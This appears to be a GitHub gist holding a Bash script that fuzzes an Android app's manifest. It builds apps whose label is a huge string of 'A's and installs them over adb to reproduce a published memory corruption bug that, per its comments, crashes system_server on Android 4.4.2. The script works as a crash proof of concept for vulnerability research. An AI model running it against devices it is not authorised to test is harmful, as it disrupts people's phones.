Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Nifty Little Bash Script for Fuzzing Application AndroidManifest.xml's
#!/bin/bash
#Basic set up for an Application AndroidManifest Fuzzer
#this requires a preexisting ant buildable application project to be set up! so get the SDK and ant1.8
#this file reproduces the bug mentioned here http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
#NOTE: values from 260000 and up cause SIGSEGvs to be sent to the system_server (test on KitKat 4.4.2)
#NOTE: you should probably monitor $(adb logcat)||(/system/bin/gdbserver) for responsiveness to the issue
APP_PROJ_DIR="..." #<-- PATH TO PROJ DIR
APP_PACKAGE_NAME="..." #<-- PACKAGE NAME
APP_LAUNCH_COMP="..." # <--- MAIN ACTIVITY NAME
ITER=0
for ((sample_len=251000;sample_len<252000;sample_len+=1000)) #{1000..3000}
do
FUZZ_DATA=`python -c "print 'A'*$sample_len"` #*$sample_len"`
echo '<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.vuln.manifest"
android:versionCode="1"
android:versionName="1.0">
<application android:label="'$APP_LAUNCH_COMP'" android:icon="@drawable/ic_launcher">
<activity android:name="'$APP_LAUNCH_COMP'"
android:label="@string/app_name">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
</manifest>' > $APP_PROJ_DIR"/AndroidManifest.xml"
echo '<?xml version="1.0" encoding="utf-8"?>
<resources>
<string name="app_name">'$FUZZ_DATA'</string>
</resources>' > $APP_PROJ_DIR"/res/values/strings.xml"
#cat $APP_PROJ_DIR"/AndroidManifest.xml"
echo "[*] {$ITER} (activity->android:label):$sample_len ~ "`cat $APP_PROJ_DIR"/res/values/strings.xml" | wc -c`
cd $APP_PROJ_DIR
#ant debug install 2>&1 >> /dev/null
ant debug install
adb shell am start -n $APP_PACKAGE_NAME/$APP_PACKAGE_NAME"."$APP_LAUNCH_COMP
cd -
ITER=`expr $ITER + 1`
echo "[*] Launch app and check adblog!"
sleep 60
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment